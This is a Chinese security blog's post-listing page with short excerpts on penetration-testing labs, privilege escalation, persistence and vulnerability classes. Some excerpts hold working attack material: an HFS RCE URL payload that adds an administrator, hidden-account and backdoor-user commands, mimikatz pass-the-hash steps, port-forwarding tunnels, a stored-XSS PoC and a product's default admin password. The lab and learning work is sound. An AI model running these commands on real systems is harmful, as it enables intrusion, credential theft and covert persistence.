自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(48)
  • 收藏
  • 关注

原创 春秋云镜靶机

Spring framework 是Spring 里面的一个基础开源框架,其目的是用于简化 Java 企业级应用的开发难度和开发周期,2022年3月31日,VMware Tanzu发布漏洞报告,Spring Framework存在远程代码执行漏洞,在 JDK 9+ 上运行的 Spring MVC 或 Spring WebFlux 应用程序可能容易受到通过数据绑定的远程代码执行 (RCE) 的攻击。WSO2文件上传漏洞(CVE-2022-29464)是Orange Tsai发现的WSO2上的严重漏洞。

2023-04-10 15:36:49 1563 2

原创 QQ安卓版本V8.8.5.5570存储型XSS漏洞

1、更新QQ版本到最新,安卓版本V8.8.5.5570/2、打开我的收藏 - 粘贴POC: %3Cscript%3Ealert%281%29;%3C/script%3E&r=software3、返回之后点击最新添加的收藏 - 点击右上方三个点 - 点击编辑 - 再返回 - 成功弹窗/4、返回再进去还是弹窗,可知是存储型XSS5、poc里面的字可随便写,例如: %3Cscript%3Ealert%28/你被控制了/%29;%3C/script%3E&r=software...

2021-07-12 10:25:05 1656

原创 常用端口

各种中间件 数据库常用默认端口80 HTTP服务器,默认端口号为80/tcp(木马Executor开放此端口)443 HTTPS(securely transferring web pages)服务器,默认端口号为443/tcp 443/udp80/8080/3128/8081/9098 HTTP协议代理服务器常用端口号:80/8080/3128/8081/90981080 SOCKS代理协议服务器常用端口号:108021 FTP(文件传输)协议代理服务器常用端口号:2

2021-07-12 08:45:24 710

原创 哈希传递(PTH)攻击利用

哈希传递(PTH)攻击利用环境:kali &win8privilege::debugsekurlsa::logonpasswordswin8中运行:网上github先下载mimikatz_trunk,下载解压后在x64中打开小猕猴桃sekurlsa::pth /user:administrator /domain:本机IP /ntlm:7365e3b22baeaebc0411873eedf84390kali中按下方操作msf > use exploit/wind

2021-06-01 21:44:41 879

原创 win10 永恒之黑复现

永恒之黑复现一:漏洞简介漏洞原理:SMB远程代码执行漏洞SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。Windows 10和Windows Server 2016引入了SMB 3.1.1 。本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数

2021-05-31 14:37:51 1866 2

原创 vulnstack1--红队靶机

思路流程:环境搭建(靶机环境)一、前渗透的阶段首先信息收集getshell尝试内网信息收集二、后渗透阶段(一)msf和cs联动内网信息收集三、攻击域(内网渗透)(一)提权(二)横向移动攻击域控...

2021-05-31 14:12:31 593

原创 流量映射端口反弹

实验1:LCX端口转发正向转发内网主机执行:lcx.exe –slave 公网主机IP 公网主机端口 内网主机IP 内网主机端口外网主机执行:Lcx.exe –listen 公网主机端口1 公网主机端口2反向转发外网主机执行:Lcx.exe -tran 53 目标主机IP 3389试验二:PORTMAP端口转发正向转发内网主机执行:./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 公网主机ip -p2 6666外网主机执行:./por

2021-05-26 21:23:24 867 1

原创 linux定时计划反弹shell

crontabcrontab命令常见于Unix和Linux的操作系统之中,用于设置周期性被执行的指令。该命令从标准输入设备读取指令,并将其存放于“crontab”文件中,以供之后读取和执行。通常,crontab储存的指令被守护进程激活。crond 常常在后台运行,每一分钟检查是否有预定的作业需要执行。这类作业一般称为cron jobs。安装(默认自带crontab)yum -y install vixie-cronyum -y install crontabs说明:vixie-cron 软件包

2021-05-26 20:19:01 2399

原创 生活小技能

win10 屏幕亮度调节不了怎么办?1、win+r 输入:regedit ,打开注册表2、HKEY_LOCAL_MACHINE3、SYSTEM4、ControlSet0015、Control6、Class7、{4d36e968-e325-11ce-bfc1-08002be10318}8、右侧栏目添加 KMD_EnableBrightnesslnterface29、重启电脑再进行测试,亲测有效。...

2021-05-24 01:24:02 397

原创 Linux权限维持

1、一句话添加用户和密码添加普通用户:#创建一个用户名guest,密码123456的普通用户useradd -p `openssl passwd -1 -salt 'salt' 123456` guest#useradd -p 方法 是用来存放可执行的系统命令,"$()"也可以存放命令执行语句useradd -p "$(openssl passwd -1 123456)" guest#chpasswd方法useradd guest;echo 'guest:123456'|chpassw

2021-05-24 00:57:07 228 1

原创 Linux权限

Linux提权大全日站就要日个彻底。往往我们能拿下服务器的web服务,却被更新地比西方记者还快的管理员把内网渗透的种子扼杀在提权的萌芽里面。Linux系统的提权过程不止涉及到了漏洞,也涉及了很多系统配置。Linux提权信息收集:什么系统?什么版本?cat /etc/issuecat /etc/*-releasecat /etc/lsb-release # Debian basedcat /etc/redhat-release # Redhat based什么内核?是64位吗?

2021-05-24 00:12:08 1041

原创 Os-hackNos-1靶机

靶机环境准备:1.去靶机的网站进行下载,下载中间那个镜像即可。2.虚拟机开始一直按shift,弹出一个框,然后按e进入页面3.一直往下走,找到ro,ro修改为rw single init=/bin/bash,然后按ctrl+x,进入页面4.查ip发现查不到,记住网卡的名称,2、ens33。准备修改配置信息5.vim /etc/network/interfaces 看一下配置信息用的是哪一个网卡,把这两个都改成 ens336.然后**/etc/init.d/networking restart**

2021-05-20 09:02:40 286

原创 Windows权限维持

0x01 影子账号创建创建普通账号net user laosec 123admiN@ /add #创建普通账号laosec密码为123admiN@net localgroup administrators laosec /add #将普通账号laosec添加进administrators组创建隐藏账号net user laosec$ 123admiN@ /add #创建隐藏账号laosec密码为123admiN@(计算机管理

2021-05-18 21:39:26 289

原创 Windows权限

0x01 windows权限提权分类:提权可分为纵向提权与横向提权纵向提权:低权限角色获得高权限角色的权限;横向提权:获取同级别角色的权限。脚本权限:通常来说,不同的脚本所处的权限是不一样的。这就意味着,如果该站点支持权限更高的脚本,我们可以上传该权限更高的脚本的大马,进而拿到更高的权限。asp/php 通常为匿名权限(网络服务权限)aspx 通常为user权限jsp 通常为系统权限Windows系统权限:在Windows系统中,权限大概分为三种,分别是:system: 中文意思是系

2021-05-18 20:42:14 701

原创 python小测试

姓名: 作答时间:1:请说明解释型语言和编译型语言之间的区别2:面向过程编程/函数式编程/面向对象编程三者之间的异同点3:请写出Python的选择结构与循环结构,注意语法格式4:请简单描述8中基本的排序算法,并说明其优缺点。插入排序/希尔排序/选择排序/冒泡排序/快速排序/堆排序/归并排序/基数排序5:针对文件操作的方法,请写出6中,并写出C类1-255IP地址(参照PHP操作方法)r  只读,默认模式w  只写,不可读,若文件不存在则创建,若存在,则删除内容,写入新内容a

2021-05-14 20:51:20 3806 1

原创 中新金盾信息安全管理系统存在默认密码

FOFA查询:title=“中新金盾信息安全管理系统”系统默认管理员账号密码:admin/zxsoft1234!@#$1、查找中新金盾信息安全管理系统的poc:import reimport requests# 获取网页内容r = requests.get('https://fofa.so/result?qbase64=dGl0bGU9IuS4reaWsOmHkeebvuS%2FoeaBr%2BWuieWFqOeuoeeQhuezu%2Be7nyI%3D')data = r.text# 利

2021-05-13 20:18:08 2174

原创 安全开发-HFS漏洞利用脚本编写

0x01 安全开发-HFS漏洞利用脚本编写下载并在虚拟机2008里面(因为主机防火墙缘故)开启HFS~网络文件服务器 2.3Beta一、攻击准备复制HFS的IP在浏览器中,并且在IP后添加用户exp/?search==%00%7B.exec%7Ccmd.exe%20/c%20net%20user%20TechSupport%20admin.12345%20/add%20%26%20net%20localgroup%20administrators%20admin.12345%20/add.%7D

2021-05-12 21:30:15 1002

原创 DC 靶机

DC-1实战大致流程(copy博客为lainwith的)环境kali1、首先ifconfig 得知ip为192.168.149.xxx/2、局域网探测arp-scan -l 得知靶机ip为192.168.149.1473、扫描端口nmap -sV -p- 192.168.149.147,查看端口信息,得知80端口开放,浏览器访问80端口查看4、目录遍历dirb http://192.168.149.147,无可用信息5.、启动Metersploit来查看漏洞并利用漏洞msfconsole6

2021-05-12 19:22:08 4076

原创 安全开发-Vsftpd2.3.4后门利用脚本编写

靶场环境定位环境IP Address攻击机Python3.8主机ip靶机Metasploitable2靶机ip靶机:Metasploitable2 用户名:msfadmin 密码:msfadmin步骤一:主机FTP登录cmd->ftp 主机IP->回车->任意数字或字母:)->回车->任意密码->回车以上操作完成后即可开启后门侦听6200端口测试:可在靶机中输入:netstat -aupto | grep 6200

2021-05-12 19:10:25 492 1

原创 Python1

Python简介Python是一个高层次的结合了解释性、编译性、互动性和面向对象的脚本语言。Python 的设计具有很强的可读性,相比其他语言经常使用英文关键字,其他语言的一些 标点符号,它具有比其他语言更有特色语法结构。Python特点1.易于学习:Python有相对较小的关键字,结构简单,和一个明确定义的语法,学习起来更加简单2.易于阅读:Python代码定义的更清晰3.易于维护:Python的成功在于它的源代码是相当容易维护的4.一个广泛的标准库:Python的最大优势之一是丰富的库,跨

2021-05-10 17:41:55 116

原创 html静态页面

0x00 什么是网页?网页是网站中的-“页”,通常是HTML格式的文件,它通过浏览器来阅读。网页是构成网站的基本元素,它通常由图片、链接、文字、声音、视频等元素组成。通常我们看到的网页,常见以 .htm 或 .hmtl 后缀结尾的文件,因此将其俗称为HTML文件。什么是HTML?HTML指的是超文本标记语言,它是用来描述网页的一种语言。HTML不是一种编程语言,而是一种标记语言。标记语言是一套标记标签。所谓超文本,有2层含义:1、它可以加入图片、声音、动画、多媒体等内容(超越了文本

2021-05-06 22:10:37 3906 1

原创 Thinkphp环境配置和认知

0x01 MVC设计模式V 即View视图是指用户看到并与之交互的界面。比如由html元素组成的网页界面,或者软件的客户端界面。MVC的好处之一在于它能为应用程序处理很多不同的视图。在视图中其实没有真正的处理发生,它只是作为一种输出数据并允许用户操纵的方式。M 即model模型是指模型表示业务规则。在MVC的三个部件中,模型拥有最多的处理任务。被模型返回的数据是中立的,模型与数据格式无关,这样一个模型能为多个视图提供数据,由于应用于模型的代码只需写一次就可以被多个视图重用,所以减少了代码的重复性。C

2021-04-29 15:07:26 368

原创 国内外CMS代码审计实战分析

国内CMS代码审计实战分析 (阿样发卡网v6.0)一、前台SQL注入利用Seay工具,进行审计。跟进ajax.php文件仔细看这个代码,可以发现这个文件先取POST包中的t参数,然后把取到的参数内容带入数据库中查询if_km表中的out_trade_no ,trade_no,rel 列最后在输出代码虽然这行代码总体看来没问题的且有可能存在注入,不过我们仔细看这里可以发现程序会把取到的参数带入_IF函数中进行过滤显然程序对参数进行了过滤,那我们现在看看程序会对什么值进行过滤,然后对症下药

2021-04-29 08:21:48 773

原创 常见漏洞代码审计

0x01 SQL注入代码审计数字型SQL注入审计当程序的变量没有做处理而直接拼接在SQL注入语句中,没有单引号的保护,就容易造成SQL注入。字符型SQL注入审计当程序的变量没有做处理而直接拼接在SQL注入语句中,虽然有单引号的保护,但我们如果能闭合SQL,也就产生了SQL注入漏洞。其实两者的区别就是有没有单引号的保护漏洞复现(数字型SQL注入)代码漏洞利用HTTP头注入审计漏洞复现(HTTP头注入)代码漏洞利用盲注盲注最大的特点就是注入返回的数据不会在页面上进行显示。所

2021-04-28 09:05:37 639

原创 代码&命令注入漏洞

代码注入漏洞简介漏洞成因由于服务端存在执行的函数,在使用的过程中没有做好一个严格的控制,造成了实际的参数在客户端中可控。漏洞危害敏感信息泄露webshell获取命令执行任意文件读取权限提升…代码执行相关函数eval()(静态调用):把字符串code作为PHP代码执行 该字符串必须是合法的PHP代码,且必须以分号结尾。assert()(<php7动态调用) :assert():判断是否为字符串,是则当成代码执行,实际它是PHP中的断言,断言就是用于在代码中捕捉这些假设,可

2021-04-27 15:02:33 1363

原创 文件上传漏洞asp、php、jsp、aspx如何绕过黑名单

文件上传漏洞asp、php、jsp、aspx如何绕过黑名单脚本语言绕过方式asp.php/.php5/.php4/.php3/.php2/php1/.html/.htm/.phtml/.pHp/.pHp5/.pHp4/.pHp3/.pHp2/.pHp1/.Html/.Htm/.pHtmlphp.jsp/.jspa/.jspx/.jsw/.jsv/.jspf/.jtml/.jSp/.jSpx/.jSpa/.jSw/.jSv/.jSpf/.jHtmljsp.asp/.as

2021-04-27 14:59:53 3640

原创 代码审计

前言代码审计工具 thankphp 5.0.x exphttps://www.feelingshome.cn/index.php&width=1280&height=720蚁剑相连->虚拟终端->whoami->idurl:协议://IP地址或域名:端口/访问资源路径/访问资源?变量1=值1&变量2=值2thinkphp框架访问格式:协议://IP地址或域名:端口/public/index.php/控制器名、方法名/方法参数名/参数值代码审计介绍

2021-04-26 22:59:50 1372

原创 IIS PUT漏洞&心脏滴血&任意文件读取与下载

IIS PUT漏洞

2021-04-24 21:35:43 1179

原创 未授权访问漏洞

web端未授权访问未授权访问:未授权访问漏洞可以理解为需要安全配置或权限认证的地址,授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。B/S架构中一般存在后台界面中,访问特定目录下的敏感文件,能直接跳过管理员登录,去访问后台管理内容。C/S架构中一般存在默认安装的一些客户端应用程序中,安装人员因缺少安全意识导致攻击者利用。web端未授权挖掘实例查找技巧1、在访问后台时会在一瞬间加载出后台界面, 这时可以尝试挖掘。2、在后台地址url中后面输入

2021-04-24 11:50:37 4597 1

原创 Sqlmap的使用

SQLMAP简介与配置SQLMap是一款由Python2开发的自动化SQL注入工具,其主要功能是扫描、发现并利用SQL注入漏洞,它内置了很多绕过插件,并且支持多种数据库,如MySQL、Oracle、PostgreSQL、SQL Sever、Access、IBM DB2、SQLite等数据库。SQLMAP的强大之处在于对数据库指纹的识别、数据库枚举、数据提取、访问目标文件系统、并在获取完全的操作权限时执行任意命令,它支持一下几种独特的注入:基于布尔类型的注入,即可根据返回页面判断条件真假的注入。基于

2021-04-23 12:24:41 598

原创 框架和中间件漏洞

Struts 2漏洞简介Apache Struts 2 最初被称为Webwork2,它是一个简洁的,可扩展的框架,可用于创建企业级java web应用程序,设计这个框架是为了从构建,部署,到应用程序维护方面来简化整个开发周期。Struts2漏洞是一个远程命令执行漏洞和开放重定向漏洞,利用漏洞, 黑客可发起远程攻击,不但可以获取网站数据信息,甚至还可取得网站服务器控制权。而且,目前针对此漏洞的自动化工具开始出现,攻击者无需具备与漏洞相关的专业知识即可侵入服务器,直接执行命令操作,盗取数据甚至进行毁灭性操作

2021-04-23 12:22:22 803

原创 MSF和永恒之蓝&渗透安卓手机

Metasploit简介Metasploit框架是一个开源的渗透工具,它是由Ruby语言编写的模块化框架,具有良好的扩展性,通过它可以轻易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。它提供了多个基本的用户接口,包括终端、命令行、图形化等,一般我们使用较多的是终端MSF和图形化的Armitage它分为社区版和商业版qpt-get updateapt-get install metasploit-frameworkMSF框架是由多个模块组成的,具体的模块

2021-04-23 12:19:46 2267 1

原创 APP测试&反编译工具使用

“反编译Apk”,看上去好像很高端,其实不然,就是通过某些反编译软件,对我们的APK进行反编译,从而获取程序的源代码,图片,XML资源等文件。简单点的,我们可以下载别人的APK,然后改下后缀名,改成xxx.zip,然后解压:但是这种方法,获得的只会是一些。png,或者.jpg这样的位图文件资源,如果是xml类的资源,打开我们会发现是乱码,并且假如我们想看APK程序的java代码,也是行不通的,因为他们都打被打包到classes.dex文件中!但是反编译可以解决你的需要,另外,切勿拿反编译来做违法的事,比

2021-04-23 12:18:26 577

原创 解析漏洞

IIS解析漏洞什么是解析漏洞?解析漏洞主要是一些特殊文件被Apache、IIS、Nginx等Web容器在某种情况下解释成脚本文件格式并得以执行而产生的漏洞。解析漏洞分类:IIS解析漏洞Nginx解析漏洞Apache解析漏洞IIS解析漏洞:1、目录解析: 以*.asp命名的文件夹里的文件都将会被当成ASP文件执行。2、文件解析.asp;.jpg像这种畸形文件名在“;”后面的直接被忽略,也就是说当成.asp...

2021-04-23 12:16:00 3891

原创 同源策略&CORS跨域漏洞&JSONP跨域漏洞

同源策略介绍什么是同源策略?同源策略是一种约定,它是浏览器最核心的也是最基本的安全功能,如果缺少了同源策略,则浏览器的正常功能可能会受影响。可以说Web是构建在同源策略基础之上的,浏览器只是针对同源策略的一种实现。同源策略,它是由Netscape提出的一个著名的安全策略。当一个浏览器的两个tab页中分别打开来百度和谷歌的页面。当浏览器的百度tab页执行一个脚本的时候会检查这个脚本是属于哪个页面的。即检查是否同源,只有和百度同源的脚本才会执行。如果非同源,那么在请求数据时,浏览器会在控制台中报

2021-04-23 12:15:36 443 1

原创 XSS漏洞

xss漏洞介绍和分类什么是XSS?XSS(Cross SiteScripting)跨站脚本,较合适的方式应该叫做跨站脚本攻击,诞生于1996年,人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSS。xss分类:反射型(非持久型):攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发漏洞。存储型(持久性):payload被存储到数据库

2021-04-22 17:11:01 980

原创 文件包含漏洞

什么是文件包含?开发者在开发PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当做PHP来执行,这会为开发者节省大量的时间。文件包含漏洞如何产生的?文件包含函数加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致了执行了非预期的代码。php.ini设置中allow_url_include=on/off开关开启意味可能存在远程包含(源程序代码可能存在过滤等情况),关闭意味不存在远程包含。大多数web语言都可以使用文件包含操作,其中PHP语言所提供的文件包含

2021-04-22 17:08:13 166

原创 XXE漏洞

XML及DTD介绍XML指可扩展标记语言,设计用来进行数据的传输和存储。XML是一种标记语言,很类似HTMLXML的设计宗旨是传输数据,而非显示数据XML标签没有被预定义。您需要自行定义标签XML被设计为具有自我描述性XML是W3C的推荐标准XML是不作为的XML仅仅是纯文本XML可以发明自己的标签XML是对HTML的补充XML是W3C的推荐标准XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。文档类型定义(DTD)可定义合法的XML文档构建模块。它使用一系列合

2021-04-22 16:53:52 176

原创 序列化与反序列化漏洞

序列化与反序列化什么是序列化?将对象的状态信息转换为可以存储或传输形式的过程(字符串)。在序列化期间,对象将其当前的状态写入到临时(内存)或持久性存储区(硬盘)。以后可以通过从存储区中读取或者反序列化对象状态,重新创建状态。简单来讲,序列化就是把一个对象变成可传输的字符串,可以以特定的格式在进程之间跨平台、安全的进行通信。字符串包括,属性名,属性值,属性类型和该对象对应的类名。对象的序列化利于对象的 保存和传输 ,也可以让多个文件共享对象。将用户存储到临时或硬盘中(数据库),可以理解为一个拍快照,通

2021-04-22 15:42:21 682

原创 URL跳转漏洞

URL跳转漏洞产生的原因没有考虑过任意URL跳转漏洞,或者根本不知道/不认为这是个漏洞考虑不周,用取子串、取后缀等方法简单判断,代码逻辑可被绕过对传入参数做一些奇葩的操作(域名剪切/拼接/重组)和判断,适得其反,反被绕过原始语言自带的解析URL、判断域名的函数库出现逻辑漏洞或者意外特性,可被绕过原始语言、服务器/容器特性/容器特性、浏览器等对标准URL协议解析处理等差异性导致被绕过URL跳转漏洞介绍1、钓鱼利用源码小偷制作的钓鱼网站2、配合csrf配合csrf操作危险请求3、配合xss

2021-04-22 14:10:25 2154

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除